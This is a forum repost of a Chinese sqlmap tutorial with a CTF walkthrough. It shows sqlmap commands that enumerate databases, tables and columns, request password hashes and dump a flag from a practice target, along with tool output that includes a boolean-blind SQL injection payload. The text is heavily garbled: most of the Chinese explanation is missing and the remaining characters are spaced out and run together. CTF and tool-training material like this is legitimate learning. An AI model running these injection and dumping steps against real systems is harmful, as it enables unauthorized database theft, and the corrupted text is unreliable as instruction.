[22161] 2021-07-16_Sqlmap基础用法、CTF实战及请求参数设置详解

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2021-07-16_Sqlmap基础用法、CTF实战及请求参数设置详解 S q l m a p C T F E a s t m o u n t   L e m o n S e c   2 0 2 1 - 0 7 - 1 6 ~ . S q l m a p . S q l m a p C T F 1 . 2 . 3 . 4 . 5 . 6 . . S q l m a p 1 . S q l m a p 2 . S q l m a p   U R L 3 . S q l m a p 4 . S q l m a p   G o o g l e . S q l m a p 1 . S q l m a p H T T P 2 . S q l m a p P O S T 3 . S q l m a p 4 . S q l m a p C o o k i e . g i t h u b h t t p s : / / g i t h u b . c o m / e a s t m o u n t y x z / S y s t e m S e c u r i t y - R e v e r s e A n a l y s i s h t t p s : / / g i t h u b . c o m / e a s t m o u n t y x z / N e t w o r k S e c u r i t y S e l f - s t u d y 绿
. S q l m a p S q l m a p S Q L P y t h o n 访 广 访 S q l m a p G i t h u b P y t h o n P I P h t t p : / / s q l m a p . o r g / G i t h u b h t t p s : / / g i t h u b . c o m / s q l m a p p r o j e c t / s q l m a p / S q l m a p P y t h o n P y t h o n P y h o n p i p   i n s t a l l   s q l m a p S q l m a p G i t h u b
C M D S q l m a p P y t h o n S q l m a p 使 P y t h o n P y t h o n S q l m a p . p y S q l m a p p y t h o n   s q l m a p . p y p y t h o n   s q l m a p . p y   - - v e r s i o n p y t h o n   s q l m a p . p y   - h
K a l i 使 使 S q l m a p . S q l m a p S q l m a p s q l m a p   u   s q l m a p   u     - - d b s s q l m a p   u     D     - - t a b l e s s q l m a p   u     D     T     - - c o l u m n s s q l m a p   u     D     T     C     - - d u m p C T F S Q L M A P B U U C T F h t t p : / / c t f 5 . s h i y a n b a r . c o m / w e b / i n d e x _ 3 . p h p ? i d = 1 S Q L f l a g p y t h o n   s q l m a p . p y   - h h
S Q L M A P 1 . p y t h o n   s q l m a p . p y   - u " h t t p : / / c t f 5 . s h i y a n b a r . c o m / w e b / i n d e x _ 3 . p h p ? i d = 1 " - - d b s 3 d b s d a t a b a s e s 2 . p y t h o n   s q l m a p . p y   - u   " h t t p : / / c t f 5 . s h i y a n b a r . c o m / w e b / i n d e x _ 3 . p h p ? i d = 1 "   - - c u r r e n t - d b c u r r e n t - d b M y S Q L w e b 1
L O G O 3 . p y t h o n   s q l m a p . p y   - u   " h t t p : / / c t f 5 . s h i y a n b a r . c o m / w e b / i n d e x _ 3 . p h p ? i d = 1 "   - - c u r r e n t - u s e r w e b 1 @ l o c a l h o s t C : U s e r s y x z D e s k t o p s q l m a p - m a s t e r > p y t h o n   s q l m a p . p y   - u   " h t t p : / / c t f 5 . s h i y a n b a r . c o m / w e b / i n d e x _ 3 . p h p ? i d = 1 "   - - c u r r e n t - d b                 _ _ _               _ _ H _ _   _ _ _   _ _ _ [ " ] _ _ _ _ _   _ _ _   _ _ _     { 1 . 3 . 1 1 . 8 6 # d e v } | _   - |   .   [ , ]           |   . ' |   .   | | _ _ _ | _     [ ( ] _ | _ | _ | _ _ , |     _ |             | _ | V . . .               | _ |       h t t p : / / s q l m a p . o r g [ ! ]   l e g a l   d i s c l a i m e r :   U s a g e   o f   s q l m a p   f o r   a t t a c k i n g   t a r g e t s   w i t h o u t   p r i o r   m u t u a l   c o n s e n t   i s   i l l e g a l .   I t   i s   t h e   e n d   u s e r ' s   r e s p o n s i b i l i t y   t o   o b e y   a l l   a p p l i c a b l e   l o c a l ,   s t a t e   a n d   f e d e r a l   l a w s .   D e v e l o p e r s   a s s u m e   n o   l i a b i l i t y   a n d   a r e   n o t   r e s p o n s i b l e   f o r   a n y   m i s u s e   o r   d a m a g e   c a u s e d   b y   t h i s   p r o g r a m [ * ]   s t a r t i n g   @   1 1 : 2 7 : 3 2   / 2 0 1 9 - 1 1 - 2 1 / [ 1 1 : 2 7 : 3 2 ]   [ I N F O ]   r e s u m i n g   b a c k - e n d   D B M S   ' m y s q l ' [ 1 1 : 2 7 : 3 2 ]   [ I N F O ]   t e s t i n g   c o n n e c t i o n   t o   t h e   t a r g e t   U R L s q l m a p   r e s u m e d   t h e   f o l l o w i n g   i n j e c t i o n   p o i n t ( s )   f r o m   s t o r e d   s e s s i o n : - - - P a r a m e t e r :   i d   ( G E T )         T y p e :   b o o l e a n - b a s e d   b l i n d         T i t l e :   A N D   b o o l e a n - b a s e d   b l i n d   -   W H E R E   o r   H A V I N G   c l a u s e         P a y l o a d :   i d = 1 '   A N D   2 1 1 2 = 2 1 1 2   A N D   ' b t e m ' = ' b t e m - - - [ 1 1 : 2 7 : 3 3 ]   [ I N F O ]   t h e   b a c k - e n d   D B M S   i s   M y S Q L w e b   a p p l i c a t i o n   t e c h n o l o g y :   N g i n x   1 . 1 0 . 2 ,   P H P   5 . 5 . 3 8 b a c k - e n d   D B M S :   M y S Q L   5 [ 1 1 : 2 7 : 3 3 ]   [ I N F O ]   f e t c h i n g   c u r r e n t   d a t a b a s e [ 1 1 : 2 7 : 3 3 ]   [ W A R N I N G ]   r u n n i n g   i n   a   s i n g l e - t h r e a d   m o d e .   P l e a s e   c o n s i d e r   u s a g e   o f   o p t i o n   ' - - t h r e a d s '   f o r   f a s t e r   d a t a   r e t r i e v a l [ 1 1 : 2 7 : 3 3 ]   [ I N F O ]   r e t r i e v e d :   w e b 1 c u r r e n t   d a t a b a s e :   ' w e b 1 ' [ 1 1 : 2 7 : 3 5 ]   [ I N F O ]   f e t c h e d   d a t a   l o g g e d   t o   t e x t   f i l e s   u n d e r   ' C : U s e r s y x z A p p D a t a L o c a l s q l m a p o u t p u t c t f 5 . s h i y a n b a r . c o m ' [ * ]   e n d i n g   @   1 1 : 2 7 : 3 5   / 2 0 1 9 - 1 1 - 2 1 /
p y t h o n   s q l m a p . p y   - u   " h t t p : / / c t f 5 . s h i y a n b a r . c o m / w e b / i n d e x _ 3 . p h p ? i d = 1 "   - - p a s s w o r d s 4 . p y t h o n   s q l m a p . p y   - u   " h t t p : / / c t f 5 . s h i y a n b a r . c o m / w e b / i n d e x _ 3 . p h p ? i d = 1 "   - D   w e b 1   - - t a b l e s w e b 1 - D t a b l e s f l a g w e b _ 1
5 . p y t h o n   s q l m a p . p y   - u   " h t t p : / / c t f 5 . s h i y a n b a r . c o m / w e b / i n d e x _ 3 . p h p ? i d = 1 "   - D   w e b 1   - T   w e b _ 1   - - c o l u m n s p y t h o n   s q l m a p . p y   - u   " h t t p : / / c t f 5 . s h i y a n b a r . c o m / w e b / i n d e x _ 3 . p h p ? i d = 1 "   - D   w e b 1   - T   f l a g   - - c o l u m n s f l a g D a t a b a s e :   w e b 1 T a b l e :   f l a g [ 3   c o l u m n s ] + - - - - - - - - + - - - - - - - - - - - - - + |   C o l u m n   |   T y p e                 | + - - - - - - - - + - - - - - - - - - - - - - + |   f l a g       |   n o n - n u m e r i c   | |   i d           |   n u m e r i c           | |   n a m e       |   n o n - n u m e r i c   | + - - - - - - - - + - - - - - - - - - - - - - +
6 . p y t h o n   s q l m a p . p y   - u   " h t t p : / / c t f 5 . s h i y a n b a r . c o m / w e b / i n d e x _ 3 . p h p ? i d = 1 "   - D   w e b 1   - T   f l a g   - C   " f l a g , i d , n a m e "   - - d u m p f l a g { Y 0 u _ @ r 3 _ 5 O _ d A m n _ 9 0 O d } S Q L S Q L M A P 1 2 3 4 S Q L X S S [ 1 1 : 5 6 : 5 9 ]   [ I N F O ]   r e t r i e v e d :   1 [ 1 1 : 5 6 : 5 9 ]   [ I N F O ]   r e t r i e v e d :   f l a g { Y 0 u _ @ r 3 _ 5 O _ d A m n _ 9 0 O d } [ 1 1 : 5 7 : 0 7 ]   [ I N F O ]   r e t r i e v e d :   2 [ 1 1 : 5 7 : 0 8 ]   [ I N F O ]   r e t r i e v e d :   b a l o t e l i D a t a b a s e :   w e b 1 T a b l e :   f l a g [ 1   e n t r y ] + - - - - - - - - - - - - - - - - - - - - - - - - - - - - + - - - - + - - - - - - - - - - + |   f l a g                                               |   i d   |   n a m e           | + - - - - - - - - - - - - - - - - - - - - - - - - - - - - + - - - - + - - - - - - - - - - + |   f l a g { Y 0 u _ @ r 3 _ 5 O _ d A m n _ 9 0 O d }   |   2     |   b a l o t e l i   | + - - - - - - - - - - - - - - - - - - - - - - - - - - - - + - - - - + - - - - - - - - - - +
. S q l m a p 1 . S q l m a p S q l m a p D B M S : / / U S E R : P A S S W O R D @ D B M S _ I P : D B M S _ P O R T / D A T A B A S E _ N A M E M y S Q L O r a c l e S Q L   S e r v e r P o s t g r e S Q L b a n n e r D B M S : / / D A T A B A S E _ F I L E P A T H S Q L i t e M i c r o s o f t   A c c e s s F i r e b i r d e t c . 2 . S q l m a p   U R L S q l m a p U R L 使 - u - u r l U R L h t t p ( s ) :   / / t a r g e t _ u r l [ : p o r t ] / [ ] C T F b a n n e r S Q L X S S p y t h o n   s q l m a p . p y   - d   " m y s q l : / / a d m i n : a d m i n @ 1 9 2 . 1 6 8 . 2 1 . 1 7 : 3 3 0 6 / t e s t d b "   - f   - - b a n n e r   - - d b s   - - u s e r s p y t h o n   s q l m a p . p y   - u   " h t t p : / / c t f 5 . s h i y a n b a r . c o m / w e b / i n d e x _ 3 . p h p ? i d = 1 "   - - b a n n e r
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则